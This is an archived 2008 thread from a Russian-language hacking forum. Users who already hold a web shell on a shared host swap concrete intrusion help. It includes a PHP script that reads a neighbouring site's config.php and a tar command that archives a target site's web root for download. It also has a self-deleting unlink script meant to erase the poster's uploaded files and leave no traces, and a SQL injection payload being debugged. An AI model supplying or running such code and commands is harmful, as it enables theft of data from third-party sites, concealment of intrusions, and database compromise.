ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.12.2008, 21:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Попробовать сделать так - написать и залить туда такой скрипт:
PHP код:
<?
$file = file_get_contents("абсолютный_путь_к_файлу");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>
Последний раз редактировалось Pashkela; 27.12.2008 в 21:48..
|
|
|
27.12.2008, 21:59
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
2
Pashkela +
2
Imperou$
Если не выйдет-из папки с шеллом выполняем
tar -czvf arch.tar.gz /home/t/target/target.com/public/www/
можешь и файл вписать.
Cоздаст архив arch.tar.gz в папке с шеллом, внутри будет необходимое тебе содержание.Просто скачай и смотри.
|
|
|
|
27.12.2008, 22:18
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
ThreeD
Спасибо, плюс.
Но архивит весь сайт =) Теперь качаю.
Pashkela
Warning: file_get_contents() [function.file-get-contents]: open_basedir restriction in effect. File(/home/t/target/target.com/public/www/config.php) is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2
|
|
|
|
27.12.2008, 22:25
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Хыыы...
Теперь у меня вопрос =)
Нифига не могу удалить через шелл с сервака свои залитые файлы. Т.е. залить любой могу, а вот удалить нет.
Ни
rm
rm -r
rm -f
rm -rf
Не помогают =(
Вопрос, как быть? Снести надо сроооочно, иначе ппц паливо устроят.
|
|
|
|
27.12.2008, 22:27
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 ThreeD:
http://ru2.php.net/manual/ru/function.chown.php
http://ru2.php.net/manual/ru/function.chmod.php
Главное: http://ru2.php.net/unlink
2 Imperou$:
PHP код:
is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2
вообще-то это тот сервер, где ты сейчас со своим шеллом сидишь, возьми да поправь
Последний раз редактировалось Pashkela; 27.12.2008 в 22:30..
|
|
|
|
27.12.2008, 22:35
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Pashkela
В php не силён.Давай подробнее. Кодить не умею я =)
|
|
|
|
27.12.2008, 22:42
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Pashkela
Я залил скрипт 1.php с таким содержанием
PHP код:
<?
$file = file_get_contents("/home/t/target/target.com/public/www/config.php");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>
на серв /home/s/site/site.com/public/www/
Что поменять?? o_O |
|
|
|
27.12.2008, 22:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Делаешь такой скрипт, обзываешь его del.php к примеру, заливаешь на сайт:
PHP код:
<? unlink ('абсолютный_путь_ до_файла/то_что хотим_удалить');
unlink ('абсолютный_путь_ до_файла/del.php'); //Самоудаляемся, не оставляем вообще никаких следов, кроме как в логах фтп и прочих
?>
запускаешь
Последний раз редактировалось Pashkela; 27.12.2008 в 22:45..
|
|
|
|
27.12.2008, 22:51
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981
Репутация:
1
|
|
Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема?
На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3
Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?
|
|
|
|
27.12.2008, 22:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Imperou$:
PHP код:
in /home/s/site/site.com/public/www/1.php on line 2
Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию
Последний раз редактировалось Pashkela; 27.12.2008 в 22:51..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид